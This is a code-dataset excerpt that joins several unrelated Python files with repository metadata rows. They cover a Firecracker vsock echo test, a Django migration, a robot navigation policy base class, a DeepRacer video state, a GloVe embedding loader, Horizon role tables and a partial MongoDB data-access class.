        self.sock = socket(AF_UNIX, SOCK_STREAM)
        self.sock.bind(path)
        self.sock.listen(SERVER_ACCEPT_BACKLOG)
        self.error = None
        self.clients = []
        self.exit_evt = Event()
        # Link the listening Unix socket into the VM's jail, so that
        # Firecracker can connect to it.
        vm.create_jailed_resource(path)

    def run(self):
        """Thread code payload.

        Wrap up the real "run" into a catch-all block, because Python cannot
        into threads - if this thread were to raise an unhandled exception,
        the whole process would lock.
        """
        try:
            self._run()
        # pylint: disable=broad-except
        except Exception as err:
            self.error = err

    def _run(self):
        while not self.exit_evt.is_set():
            # Multiplex over the listener plus every connected client; the
            # 1-second timeout lets us notice `exit_evt` promptly.
            watch_list = self.clients + [self.sock]
            rd_list, _, _ = select(watch_list, [], [], 1)
            for rdo in rd_list:
                if rdo == self.sock:
                    # Read event on the listening socket: a new client
                    # wants to connect.
                    (client, _) = self.sock.accept()
                    self.clients.append(client)
                    continue
                # Read event on a connected socket: new data is
                # available from some client.
                buf = rdo.recv(BUF_SIZE)
                if not buf:
                    # Zero-length read: connection reset by peer.
                    self.clients.remove(rdo)
                    continue
                sent = 0
                while sent < len(buf):
                    # Send back everything we just read; send() may be
                    # partial, so loop until the full buffer is echoed.
                    sent += rdo.send(buf[sent:])

    def exit(self):
        """Shut down the echo server and wait for it to exit.

        This method can be called from any thread. Upon returning, the
        echo server will have shut down.
        """
        self.exit_evt.set()
        self.join()
        # Close all sockets so the test process does not leak file
        # descriptors after the server is gone.
        for client in self.clients:
            client.close()
        self.sock.close()
class HostEchoWorker(Thread):
    """A vsock echo worker, connecting to a guest echo server.

    This will initiate a connection to a guest echo server, then start sending
    it the contents of the file at `blob_path`. The echo server should send
    the exact same data back, so a hash is performed on everything received
    from the server. This hash will later be checked against the hashed
    contents of `blob_path`.
    """

    def __init__(self, uds_path, blob_path):
        """Connect to the guest echo server through the vsock UDS at `uds_path`."""
        super().__init__()
        self.uds_path = uds_path
        self.blob_path = blob_path
        self.hash = None
        self.error = None
        self.sock = _vsock_connect_to_guest(self.uds_path, ECHO_SERVER_PORT)

    def run(self):
        """Thread code payload.

        Wrap up the real "run" into a catch-all block, because Python cannot
        into threads - if this thread were to raise an unhandled exception,
        the whole process would lock.
        """
        try:
            self._run()
        # pylint: disable=broad-except
        except Exception as err:
            self.error = err

    def close_uds(self):
        """Close vsock UDS connection."""
        self.sock.close()

    def _run(self):
        hash_obj = hashlib.md5()
        # Use a context manager so the blob file is closed even when one of
        # the socket operations below raises (the original leaked the handle).
        with open(self.blob_path, 'rb') as blob_file:
            while True:
                buf = blob_file.read(BUF_SIZE)
                if not buf:
                    break
                # send()/recv() may be partial; loop until the whole chunk
                # has been pushed out and echoed back.
                sent = self.sock.send(buf)
                while sent < len(buf):
                    sent += self.sock.send(buf[sent:])
                buf = self.sock.recv(sent)
                while len(buf) < sent:
                    buf += self.sock.recv(sent - len(buf))
                hash_obj.update(buf)
        self.hash = hash_obj.hexdigest()
def make_blob(dst_dir, size=None):
    """Generate a file of random data inside `dst_dir`.

    Args:
        dst_dir: directory in which the blob file is created.
        size: number of random bytes to write; defaults to BLOB_SIZE,
            keeping the original single-argument behavior.

    Returns:
        A `(path, md5_hexdigest)` tuple for the generated blob.
    """
    if size is None:
        size = BLOB_SIZE
    blob_path = os.path.join(dst_dir, "vsock-test.blob")
    blob_hash = hashlib.md5()
    # `with` guarantees the handle is closed even if urandom()/write() raises
    # (the original leaked the descriptor on error).
    with open(blob_path, 'wb') as blob_file:
        left = size
        while left > 0:
            # Generate in 4 KiB chunks to bound memory usage.
            count = min(left, 4096)
            buf = os.urandom(count)
            blob_hash.update(buf)
            blob_file.write(buf)
            left -= count
    return blob_path, blob_hash.hexdigest()
def check_host_connections(vm, uds_path, blob_path, blob_hash):
    """Test host-initiated connections.
    This will start a daemonized echo server on the guest VM, and then spawn
    `TEST_CONNECTION_COUNT` `HostEchoWorker` threads.
    After the workers are done transferring the data read from `blob_path`,
    the hashes they computed for the data echoed back by the server are
    checked against `blob_hash`.
    """
    conn = SSHConnection(vm.ssh_config)
    # Start the guest-side echo server; presumably '-d' daemonizes
    # vsock_helper so the SSH command returns immediately -- TODO confirm.
    cmd = "vsock_helper echosrv -d {}". format(ECHO_SERVER_PORT)
    ecode, _, _ = conn.execute_command(cmd)
    assert ecode == 0
    # Fan out the workers; each opens its own host-to-guest connection.
    workers = []
    for _ in range(TEST_CONNECTION_COUNT):
        worker = HostEchoWorker(uds_path, blob_path)
        workers.append(worker)
        worker.start()
    for wrk in workers:
        wrk.join()
    # Every worker must have received back exactly the data it sent.
    for wrk in workers:
        assert wrk.hash == blob_hash
def check_guest_connections(vm, server_port_path, blob_path, blob_hash):
    """Test guest-initiated connections.
    This will start an echo server on the host (in its own thread), then
    start `TEST_CONNECTION_COUNT` workers inside the guest VM, all
    communicating with the echo server.
    """
    echo_server = HostEchoServer(vm, server_port_path)
    echo_server.start()
    conn = SSHConnection(vm.ssh_config)
    # Increase maximum process count for the ssh service.
    # Avoids: "bash: fork: retry: Resource temporarily unavailable"
    # Needed to execute the bash script that tests for concurrent
    # vsock guest initiated connections.
    ecode, _, _ = conn.execute_command("echo 1024 > \
            /sys/fs/cgroup/pids/system.slice/ssh.service/pids.max")
    assert ecode == 0, "Unable to set max process count for guest ssh service."
    # Build the guest worker sub-command.
    # `vsock_helper` will read the blob file from STDIN and send the echo
    # server response to STDOUT. This response is then hashed, and the
    # hash is compared against `blob_hash` (computed on the host). This
    # comparison sets the exit status of the worker command.
    # NOTE(review): the '2' argument looks like the well-known host CID
    # (VMADDR_CID_HOST) -- confirm against vsock_helper's usage.
    worker_cmd = "hash=$("
    worker_cmd += "cat {}".format(blob_path)
    worker_cmd += " | vsock_helper echo 2 {}".format(ECHO_SERVER_PORT)
    worker_cmd += " | md5sum | cut -f1 -d\\ "
    worker_cmd += ")"
    worker_cmd += " && [[ \"$hash\" = \"{}\" ]]".format(blob_hash)
    # Run `TEST_CONNECTION_COUNT` concurrent workers, using the above
    # worker sub-command.
    # If any worker fails, this command will fail. If all worker sub-commands
    # succeed, this will also succeed.
    cmd = "workers=\"\";"
    cmd += "for i in $(seq 1 {}); do".format(TEST_CONNECTION_COUNT)
    cmd += " ({})& ".format(worker_cmd)
    cmd += " workers=\"$workers $!\";"
    cmd += "done;"
    cmd += "for w in $workers; do wait $w || exit -1; done"
    ecode, _, _ = conn.execute_command(cmd)
    # Stop the host echo server before asserting, so a failed assertion
    # doesn't leave the server thread running.
    echo_server.exit()
    assert echo_server.error is None
    assert ecode == 0, ecode
def _vsock_connect_to_guest(uds_path, port):
    """Return a Unix socket, connected to the guest vsock port `port`.

    Performs the Firecracker host-initiated vsock handshake: write
    "CONNECT <port>\\n" over the UDS, then expect an "OK <hostport>\\n" ack.
    """
    sock = socket(AF_UNIX, SOCK_STREAM)
    sock.connect(uds_path)
    buf = bytearray("CONNECT {}\n".format(port).encode("utf-8"))
    # sendall() guarantees the whole handshake line goes out; a bare send()
    # may transmit only part of the buffer.
    sock.sendall(buf)
    # NOTE(review): a single recv(32) assumes the full ack arrives in one
    # read -- true for this small control message in practice.
    ack_buf = sock.recv(32)
    assert re.match("^OK [0-9]+\n$", ack_buf.decode('utf-8')) is not None
    return sock
| 32.721569 | 79 | 0.618768 |
ace9516ddd579f4c20c8a251e499e70a3c670453 | 628 | py | Python | typeidea/blog/migrations/0006_auto_20181021_0326.py | xugl/typeidea | 00f96d923007efda77deec506f4c3e449254537e | [
"MIT"
] | null | null | null | typeidea/blog/migrations/0006_auto_20181021_0326.py | xugl/typeidea | 00f96d923007efda77deec506f4c3e449254537e | [
"MIT"
] | null | null | null | typeidea/blog/migrations/0006_auto_20181021_0326.py | xugl/typeidea | 00f96d923007efda77deec506f4c3e449254537e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-10-20 19:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: adds page-view ('pv') and
    # unique-visitor ('uv') counters to the blog Post model, both
    # non-negative integers defaulting to zero. Do not edit by hand.
    dependencies = [
        ('blog', '0005_post_html'),
    ]
    operations = [
        migrations.AddField(
            model_name='post',
            name='pv',
            field=models.PositiveIntegerField(default=0, verbose_name='pv'),
        ),
        migrations.AddField(
            model_name='post',
            name='uv',
            field=models.PositiveIntegerField(default=0, verbose_name='uv'),
        ),
    ]
| 24.153846 | 76 | 0.589172 |
ace9523d91d23b35dfd5c7441551b717ecae4d4b | 1,151 | py | Python | crowd_sim/envs/policy/policy.py | longhuang318/CrowdNav | 6c5c394979c968d78836e1db6d86c29992ae0b75 | [
"MIT"
] | 372 | 2018-09-27T12:57:22.000Z | 2022-03-27T13:56:24.000Z | crowd_sim/envs/policy/policy.py | longhuang318/CrowdNav | 6c5c394979c968d78836e1db6d86c29992ae0b75 | [
"MIT"
] | 44 | 2018-10-01T07:11:08.000Z | 2022-01-27T22:19:31.000Z | crowd_sim/envs/policy/policy.py | longhuang318/CrowdNav | 6c5c394979c968d78836e1db6d86c29992ae0b75 | [
"MIT"
] | 135 | 2018-10-28T03:45:12.000Z | 2022-03-30T13:57:23.000Z | import abc
import numpy as np
class Policy(object):
def __init__(self):
"""
Base class for all policies, has an abstract method predict().
"""
self.trainable = False
self.phase = None
self.model = None
self.device = None
self.last_state = None
self.time_step = None
# if agent is assumed to know the dynamics of real world
self.env = None
@abc.abstractmethod
def configure(self, config):
return
def set_phase(self, phase):
self.phase = phase
def set_device(self, device):
self.device = device
def set_env(self, env):
self.env = env
def get_model(self):
return self.model
@abc.abstractmethod
def predict(self, state):
"""
Policy takes state as input and output an action
"""
return
@staticmethod
def reach_destination(state):
self_state = state.self_state
if np.linalg.norm((self_state.py - self_state.gy, self_state.px - self_state.gx)) < self_state.radius:
return True
else:
return False
| 23.02 | 110 | 0.588184 |
ace95252a57ecc6fcae4abea30803600fd9750bb | 4,415 | py | Python | bundle/deepracer_simulation_environment/lib/python2.7/dist-packages/mp4_saving/states/virtual_event_prepare_state.py | larsll/deepracer-simapp | 9251c32ff33d49955b63ccca4f38d01a0c721d4f | [
"MIT"
] | 1 | 2022-02-23T20:34:00.000Z | 2022-02-23T20:34:00.000Z | bundle/deepracer_simulation_environment/lib/python2.7/dist-packages/mp4_saving/states/virtual_event_prepare_state.py | Bandwidth/deepracer-simapp | 9bf0a5f9c55e37ecef8e72b1b6dc15ecb0370bc1 | [
"MIT"
] | null | null | null | bundle/deepracer_simulation_environment/lib/python2.7/dist-packages/mp4_saving/states/virtual_event_prepare_state.py | Bandwidth/deepracer-simapp | 9bf0a5f9c55e37ecef8e72b1b6dc15ecb0370bc1 | [
"MIT"
] | null | null | null | """this module implements all virtual event state machine states"""
import time
import logging
import cv2
from markov.log_handler.logger import Logger
from markov.metrics.constants import EpisodeStatus
from markov.state_machine.abs_fsm_state import AbsFSMState
from markov.virtual_event.constants import (PAUSE_TIME_BEFORE_START,
WAIT_TOTAL_EVAL_SECONDS,
WAIT_SPEED,
PAUSE_TIME_AFTER_FINISH,
WAIT_DISPLAY_NAME,
WAIT_CURRENT_LAP,
WAIT_RESET_COUNTER)
from mp4_saving import utils
from mp4_saving.constants import (IconographicImageSize,
TrackAssetsIconographicPngs, RACE_COMPLETE_Y_OFFSET,
Mp4Parameter, VIRTUAL_EVENT_PREPARE_DIGIT_FONT,
RaceCarColorToRGB, VirtualEventMP4Params,
VirtualEventXYPixelLoc,
VirtualEventIconographicPngs)
LOG = Logger(__name__, logging.INFO).get_logger()
class VirtualEventPrepareState(AbsFSMState):
    """Virtual Event Prepare State.

    In the Prepare state the racecar counts down 3, 2, ... 0 on screen;
    when the PREPARE event stops arriving, the FSM transitions to
    VirtualEventRunState.
    """
    def __init__(self):
        """Initialize the Prepare state with the digit to display.

        Precomputes everything needed per frame: the starting countdown
        digit, the font, the centered (x, y) location of the digit within
        the output frame, and the BGRA "SET" icon.
        """
        LOG.info("[virtual event]: video edit state at {}".format(self))
        # Countdown starts at the configured pause-before-start (seconds).
        self._digit = int(PAUSE_TIME_BEFORE_START)
        self._amazon_ember_heavy_100px = utils.get_font('AmazonEmber-Heavy', 100)
        frame_x, frame_y = Mp4Parameter.FRAME_SIZE.value
        # Center the countdown digit in the frame, offset by the font size.
        self._loc_x, self._loc_y = (frame_x - VIRTUAL_EVENT_PREPARE_DIGIT_FONT // 2) // 2, \
                                   (frame_y - VIRTUAL_EVENT_PREPARE_DIGIT_FONT) // 2
        self._icon_image = utils.get_image(VirtualEventIconographicPngs.SET.value)
        # cv2 works in BGRA while the asset is RGBA; convert once here.
        self._icon_image = cv2.cvtColor(self._icon_image, cv2.COLOR_RGBA2BGRA)
    def _execute(self, input_val):
        """Virtual Event state machine on event call
        Args:
            input_val (dict): input value dictionary
        Returns:
            self or VirtualEventRunState: self or next state that will transit to based on event
        """
        event, info_dict = input_val['event'], input_val['info_dict']
        major_cv_image = info_dict[VirtualEventMP4Params.MAJOR_CV_IMAGE.value]
        # During the prepare phase, for smooth transition we would like to fade out the camera image
        # (Darker to Brighter image).
        fader_obj = info_dict[VirtualEventMP4Params.FADER_OBJ.value]
        major_cv_image = fader_obj.fade_out(major_cv_image)
        if event == EpisodeStatus.PREPARE.value:
            # get params from info_dict
            countdown_timer = info_dict['countdown_timer']
            # Decrement the displayed digit once each time the remaining
            # timer drops below the currently shown value.
            if 0 < countdown_timer <= self._digit - 1:
                self._digit -= 1
            # write SET icon
            icon_x, icon_y = VirtualEventXYPixelLoc.ICON.value
            major_cv_image = utils.plot_rectangular_image_on_main_image(
                major_cv_image, self._icon_image, (icon_x, icon_y))
            # write count down digit
            countdown_digit = "{}".format(self._digit)
            major_cv_image = utils.write_text_on_image(image=major_cv_image, text=countdown_digit,
                                                       loc=(self._loc_x, self._loc_y),
                                                       font=self._amazon_ember_heavy_100px,
                                                       font_color=RaceCarColorToRGB.White.value,
                                                       font_shadow_color=RaceCarColorToRGB.Black.value)
            # update info dict; eval-seconds/speed show placeholder values
            # while the race has not started yet
            info_dict[VirtualEventMP4Params.MAJOR_CV_IMAGE.value] = major_cv_image
            info_dict[VirtualEventMP4Params.TOTAL_EVAL_SECONDS.value] = WAIT_TOTAL_EVAL_SECONDS
            info_dict[VirtualEventMP4Params.SPEED.value] = WAIT_SPEED
            # stay at PREPARE state
            return self, info_dict
        # import in method to prevent circular dependency
        from mp4_saving.states.virtual_event_run_state import VirtualEventRunState
        # transit to RUN state
        return VirtualEventRunState(current_sector=0), info_dict
ace9527c2c6eed5c8bfdffc3a880cf5c45101c8f | 3,709 | py | Python | SentEval/words/embeddings.py | comRamona/Neural-Statistician | 7ff41fdf97e0e4ca3a335901d107f6de0edb5481 | [
"Unlicense"
] | 3 | 2019-03-06T18:45:09.000Z | 2022-03-10T19:11:18.000Z | SentEval/words/embeddings.py | comRamona/Neural-Statistician | 7ff41fdf97e0e4ca3a335901d107f6de0edb5481 | [
"Unlicense"
] | null | null | null | SentEval/words/embeddings.py | comRamona/Neural-Statistician | 7ff41fdf97e0e4ca3a335901d107f6de0edb5481 | [
"Unlicense"
] | 2 | 2020-06-23T09:05:37.000Z | 2022-02-25T08:39:43.000Z | from collections import Counter
from zipfile import ZipFile
from tqdm import tqdm
import random as rn
import os
import requests
import os
import sys
from urllib.request import urlretrieve
import numpy as np
from nltk import word_tokenize
#import pdb
import logging
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.DEBUG,
datefmt='%Y-%m-%d %H:%M:%S',
filename='bookNS2.log')
class GloveMatrix(object):
    """
    Downloads and loads GloVe matrix.

    Ensures the 840B.300d archive is present (downloading/unzipping when
    missing) and parses it into `self.embedding_index`, a dict mapping
    word -> float32 vector of dimension 300.
    """
    # https://nlp.stanford.edu/data/glove.840B.300d.zip
    def __init__(self):
        self.glove_url = "http://nlp.stanford.edu/data/glove.840B.300d.zip"
        self.file_name = "/homes/rgc35/Desktop/neural-statistician/SentEval/glove.840B.300d.zip"
        self.dest = "/homes/rgc35/Desktop/neural-statistician/SentEval/glove.840B.300d"
        self.download_glove()
        # load_matrix() populates (and now also returns) self.embedding_index;
        # previously its None return value was assigned to a dead local.
        self.load_matrix()
        self.EMBEDDING_DIM = 300
        print("Done")
        logging.debug("Done")
    def download_glove(self):
        """Ensure the unzipped GloVe text file exists, fetching if needed."""
        if not os.path.exists("/homes/rgc35/Desktop/neural-statistician/SentEval/glove.840B.300d/glove.840B.300d.txt"):
            if os.path.exists(self.file_name):
                self.unzip_file(self.file_name, self.dest)
            else:
                urlretrieve(self.glove_url, self.file_name, self.reporthook)
                self.unzip_file(self.file_name, self.dest)
    def load_matrix(self):
        """Parse the GloVe text file into self.embedding_index and return it."""
        print("Loading embedding matrix")
        logging.debug("Loading embedding matrix")
        self.embedding_index = {}
        with open('/homes/rgc35/Desktop/neural-statistician/SentEval/glove.840B.300d/glove.840B.300d.txt', "r") as f:
            lines = f.read().split("\n")
            for line in lines:
                values = line.split()
                if len(values) > 1:
                    try:
                        word = values[0]
                        coefs = np.asarray(values[1:], dtype='float32')
                        self.embedding_index[word] = coefs
                    except ValueError:
                        # Skip malformed rows (e.g. multi-token "words").
                        # Narrowed from a bare `except Exception: pass` so
                        # unrelated failures are no longer swallowed.
                        pass
        return self.embedding_index
    def get_index(self):
        """Return the word -> vector mapping."""
        return self.embedding_index
    def unzip_file(self, file_name, dest):
        """Extract `file_name` (a zip archive) into directory `dest`."""
        print("Unzipping file...")
        zipTest = ZipFile(file_name)
        zipTest.extractall(dest)
    def download_file(self, url, file_name):
        """Download `url` to `file_name`, reporting progress to stderr."""
        print("Downloading file...")
        # Fixed: was `urlretriseve(url, file_name, reporthook)` -- both the
        # misspelled function and the unqualified hook were NameErrors.
        urlretrieve(url, file_name, self.reporthook)
    def reporthook(self, blocknum, blocksize, totalsize):
        """urlretrieve progress callback: print percent downloaded."""
        readsofar = blocknum * blocksize
        if totalsize > 0:
            percent = readsofar * 1e2 / totalsize
            s = "\r%5.1f%% %*d / %d" % (
                percent, len(str(totalsize)), readsofar, totalsize)
            sys.stderr.write(s)
            if readsofar >= totalsize:  # near the end
                sys.stderr.write("\n")
        else:  # total size is unknown
            sys.stderr.write("read %d\n" % (readsofar,))
class TextEmbedder(object):
    """Look up per-word GloVe vectors and build fixed-size sentence matrices."""

    def __init__(self, glove_matrix):
        # Share the already-loaded word -> vector mapping.
        self.embedding_index = glove_matrix.embedding_index

    def get_any(self, word):
        # Unknown words fall back to an empty vector (length 0), matching
        # the dict-lookup default; the result is cast to float32.
        vector = self.embedding_index.get(word, np.zeros(0))
        return vector.astype(np.float32)

    def get_zero(self):
        # All-zeros padding vector matching the 300-dim embedding size.
        return np.zeros(300).astype(np.float32)

    def get_sentence_embedding(self, sent, sent_length=40):
        # Fixed-size (sent_length, 300) matrix; rows past the sentence end
        # stay zero, and the sentence is truncated at sent_length tokens.
        matrix = np.zeros((sent_length, 300))
        rows = []
        for token in sent[:sent_length]:
            rows.append(self.embedding_index.get(token, self.get_zero()))
        matrix[:len(rows), :] = np.array(rows)
        return matrix
ace953d271ad8a0036daa82c40d575b729c346d5 | 2,440 | py | Python | openstack_dashboard/dashboards/admin/roles/tables.py | Juniper/horizon | aa0b50beb4f68289cad4193f699156a77b2a0aa3 | [
"Apache-2.0"
] | null | null | null | openstack_dashboard/dashboards/admin/roles/tables.py | Juniper/horizon | aa0b50beb4f68289cad4193f699156a77b2a0aa3 | [
"Apache-2.0"
] | null | null | null | openstack_dashboard/dashboards/admin/roles/tables.py | Juniper/horizon | aa0b50beb4f68289cad4193f699156a77b2a0aa3 | [
"Apache-2.0"
] | 4 | 2015-05-05T08:17:28.000Z | 2020-02-05T10:47:06.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon import tables
from openstack_dashboard import api
class CreateRoleLink(tables.LinkAction):
    """Table action: open the 'Create Role' modal form."""
    name = "create"
    verbose_name = _("Create Role")
    url = "horizon:admin:roles:create"
    classes = ("ajax-modal", "btn-create")
    # Horizon policy check mapped to the Keystone create_role rule.
    policy_rules = (("identity", "identity:create_role"),)
    def allowed(self, request, role):
        # Only shown when the Keystone backend permits role editing.
        return api.keystone.keystone_can_edit_role()
class EditRoleLink(tables.LinkAction):
    """Per-row action: open the 'Edit' modal for a role."""
    name = "edit"
    verbose_name = _("Edit")
    url = "horizon:admin:roles:update"
    classes = ("ajax-modal", "btn-edit")
    # Horizon policy check mapped to the Keystone update_role rule.
    policy_rules = (("identity", "identity:update_role"),)
    def allowed(self, request, role):
        # Only shown when the Keystone backend permits role editing.
        return api.keystone.keystone_can_edit_role()
class DeleteRolesAction(tables.DeleteAction):
    """Batch/row action: delete one or more roles via Keystone."""
    data_type_singular = _("Role")
    data_type_plural = _("Roles")
    # Horizon policy check mapped to the Keystone delete_role rule.
    policy_rules = (("identity", "identity:delete_role"),)
    def allowed(self, request, role):
        # Only shown when the Keystone backend permits role editing.
        return api.keystone.keystone_can_edit_role()
    def delete(self, request, obj_id):
        # Called once per selected row by the DeleteAction machinery.
        api.keystone.role_delete(request, obj_id)
class RoleFilterAction(tables.FilterAction):
    """Client-side table filter over role names."""

    def filter(self, table, roles, filter_string):
        """Naive case-insensitive search."""
        needle = filter_string.lower()
        matches = []
        for role in roles:
            if needle in role.name.lower():
                matches.append(role)
        return matches
class RolesTable(tables.DataTable):
    """Admin dashboard table listing Keystone roles (name + ID columns)."""
    name = tables.Column('name', verbose_name=_('Role Name'))
    id = tables.Column('id', verbose_name=_('Role ID'))
    class Meta:
        name = "roles"
        verbose_name = _("Roles")
        # Per-row actions vs. table-level (header) actions.
        row_actions = (EditRoleLink, DeleteRolesAction)
        table_actions = (RoleFilterAction, CreateRoleLink, DeleteRolesAction)
ace953d9386ccd8e573dde5385215f5df4f42078 | 22,849 | py | Python | backend/ozon/core/ModelData.py | libremente/service-app | 3cc710d2d91ca61c9f628dd023326c16cf934c51 | [
"MIT"
] | null | null | null | backend/ozon/core/ModelData.py | libremente/service-app | 3cc710d2d91ca61c9f628dd023326c16cf934c51 | [
"MIT"
] | null | null | null | backend/ozon/core/ModelData.py | libremente/service-app | 3cc710d2d91ca61c9f628dd023326c16cf934c51 | [
"MIT"
] | null | null | null | # Copyright INRIM (https://www.inrim.eu)
# See LICENSE file for full licensing details.
import sys
import os
import logging
import pymongo
import ujson
import pydantic
from .database.mongo_core import *
from .BaseClass import PluginBase
from .QueryEngine import QueryEngine
from fastapi.exceptions import HTTPException
logger = logging.getLogger(__name__)
class ModelData(PluginBase):
    # Registry holding one instance of each concrete subclass (plugin pattern).
    plugins = []
    def __init_subclass__(cls, **kwargs):
        # Auto-register: every subclass is instantiated as soon as it is
        # defined and appended to the shared `plugins` list.
        cls.plugins.append(cls())
class ModelDataBase(ModelData):
    """Concrete ModelData plugin: CRUD/search facade over the Mongo layer.

    Wraps the mongo_core helpers with session/app-code awareness, dynamic
    model generation from stored Component schemas, list/aggregate search,
    default action + menu-group bootstrapping for new models, and save /
    soft-delete / cleanup helpers.
    """
    @classmethod
    def create(cls, session, pwd_context, app_code=""):
        """Factory entry point: build and initialise an instance."""
        self = ModelDataBase()
        self.init(session, pwd_context, app_code)
        return self
    def init(self, session, pwd_context, app_code=""):
        """Two-step initialiser used instead of __init__ (see create())."""
        self.session = session
        self.pwd_context = pwd_context
        self.app_code = app_code
        self.qe = QueryEngine.new(session=session, app_code=app_code)
        # Per-model metadata refreshed by gen_model() for dynamic models.
        self.no_clone_field_keys = {}
        self.computed_fields = {}
        self.create_task_action = {}
        self.unique_fields = []
        # Sort-direction keywords mapped to pymongo sort constants.
        self.sort_dir = {
            "asc": 1,
            "desc": -1
        }
        self.asc = 1
        self.desc = -1
        # Models with fixed schemas (not generated from Component records).
        self.system_model = {
            "component": Component,
            "session": Session,
            "attachment_trash": AttachmentTrash
        }
    def eval_sort_str(self, sortstr):
        """Parse "field:asc,other:desc" into a pymongo sort list."""
        sort_rules = sortstr.split(",")
        sort = []
        for rule_str in sort_rules:
            rule_list = rule_str.split(":")
            logger.info(rule_list)
            if len(rule_list) > 1:
                rule = (rule_list[0], self.sort_dir[rule_list[1]])
                sort.append(rule)
        return sort
    async def make_settings(self):
        """Load and cache the settings record for the current app_code."""
        self.app_settings = await self.get_app_settings(app_code=self.app_code)
    async def gen_model(self, model_name):
        """Return the model class for `model_name`, or False if unknown.

        System models are returned directly; otherwise the model is built
        dynamically from its stored Component schema via ModelMaker, and the
        per-model metadata on `self` is refreshed as a side effect.
        """
        model = False
        if model_name in self.system_model:
            model = self.system_model.get(model_name)
        else:
            component = await search_by_name(Component, model_name)
            if component:
                mm = ModelMaker(
                    model_name, component.components)
                for field in mm.unique_fields:
                    await set_unique(mm.model, field)
                self.no_clone_field_keys = mm.no_clone_field_keys
                self.computed_fields = mm.computed_fields
                self.create_task_action = mm.create_task_action
                model = mm.model
        return model
    def clean_data_to_clone(self, data: dict):
        """Reset non-clonable fields to their defaults before duplicating."""
        for k, v in self.no_clone_field_keys.items():
            if k in data and not k == "rec_name":
                data[k] = v
            if data.get("data_value") and data.get("data_value").get(k):
                data.get("data_value")[k] = v
        return data.copy()
    async def get_app_settings(self, app_code: str):
        """Fetch and cache the "settings" record named after `app_code`."""
        logger.debug(f"app_code: {app_code}")
        self.app_settings = await self.by_name("settings", app_code)
        return self.app_settings
    async def all(self, schema: Type[ModelType], sort=[], distinct=""):
        """Return every record of `schema`, with a default sort."""
        ASCENDING = 1
        """Ascending sort order."""
        DESCENDING = -1
        if not sort:
            #
            sort = [("list_order", ASCENDING), ("rec_name", DESCENDING)]
        return await search_all(schema, sort=sort)
    async def all_distinct(
            self, schema: Type[ModelType], distinct, query={}, additional_key=[], compute_label=""):
        """Distinct values of `distinct` for `schema`, as a plain data list."""
        ASCENDING = 1
        """Ascending sort order."""
        DESCENDING = -1
        querye = await self.qe.default_query(schema, query)
        list_data = await search_all_distinct(schema, distinct=distinct, query=querye, compute_label=compute_label)
        return get_data_list(list_data, additional_key=additional_key)
    async def freq_for_all_by_field_value(
            self, schema: Type[ModelType], field, field_query, min_occurence=2, add_fields="", sort=-1,
            additional_key=[]
    ):
        """Frequency count of `field` values, keeping those >= min_occurence."""
        list_data = await search_count_field_value_freq(
            schema, field=field, field_query=field_query, min_occurence=min_occurence, add_fields=add_fields, sort=sort)
        return get_data_list(list_data, additional_key=additional_key)
    async def by_name(self, model, record_name):
        """Fetch one record by rec_name; `model` may be a class or a name."""
        model_obj = model
        if isinstance(model, str):
            model_obj = await self.gen_model(model)
        return await search_by_name(model_obj, record_name)
    async def by_name_raw(self, model, record_name):
        """Raw (dict-level) fetch by rec_name, bypassing model parsing."""
        if isinstance(model, BasicModel):
            model = model.str_name()
        return await search_by_name_raw(model, record_name)
    async def user_by_token(self, token):
        """Resolve the User owning the given auth token."""
        return await search_user_by_token(User, token)
    async def by_uid(self, model, uid):
        """Fetch one record by its uid."""
        return await search_by_uid(model, uid)
    async def component_by_name(self, model_name):
        """Fetch the Component (form schema) named `model_name`."""
        return await search_by_name(Component, model_name)
    async def component_by_type(self, model_type):
        """List all Components of the given type as plain data dicts."""
        lst = await search_by_type(Component, model_type=model_type)
        return get_bj_list_data(Component, lst)
    async def component_distinct_model(self):
        """Distinct model names among stored Components."""
        return await search_distinct(Component)
    async def search_base(
            self, data_model: Type[ModelType], query={}, parent="", sort=[],
            limit=0, skip=0, use_aggregate=False):
        """Low-level search: plain filter or aggregation pipeline.

        Applies the default (list_order asc, rec_name desc) sort when none
        is given and returns raw model records.
        """
        ASCENDING = 1
        """Ascending sort order."""
        DESCENDING = -1
        """Descending sort order."""
        if not sort:
            #
            sort = [("list_order", ASCENDING), ("rec_name", DESCENDING)]
        if use_aggregate:
            list_data = await aggregate(
                data_model, query, sort=sort, limit=limit, skip=skip
            )
        else:
            list_data = await search_by_filter(
                data_model, query, sort=sort, limit=limit, skip=skip
            )
        return list_data
    async def get_list_base(
            self, data_model: Type[ModelType], fields=[], query={}, sort=[], limit=0, skip=0, model_type="",
            parent="", merge_field="", row_action="", additional_key=[],
            use_aggregate=False
    ):
        """
        additional_key handle formio id name (workaroud):
         - in form io id is defined ad '_id' but in standard mongodb id is defained 'id'
           passing replace ['rec_name', '_id'] if use formio builder to link resource in form.
           Before calling this method the params select sent from formio is '_id, title'
           in endpoint this field be going to replaced with 'rec_name', in get_data_list if
           replace is defined, adding record key '_id' with value equal 'rec_name' to send
           a list data ecpected by fomiojs buider
        """
        logger.debug(
            f"get_list_base -> data_model:{data_model}, fields: {fields}, query:{query}, sort:{sort},"
            f" model_type:{model_type}, parent:{parent}, merge_field: {merge_field}, row_action:{row_action}"
        )
        # NOTE(review): `list_data` below is never used; the call is fully
        # delegated to search().
        list_data = []
        if fields:
            fields = fields + default_list_metadata
        return await self.search(
            data_model, fields=fields, query=query, sort=sort, limit=limit, skip=skip,
            merge_field=merge_field, row_action=row_action, parent=parent, additional_key=additional_key,
            use_aggregate=use_aggregate
        )
    async def count_by_filter(self, data_model, query: Optional[Dict] = {}) -> int:
        """Count records matching `query`; `data_model` may be class or name."""
        model = data_model
        if not isinstance(data_model, str):
            model = data_model.str_name()
        return await count_by_filter(model, domain=query)
    async def search(
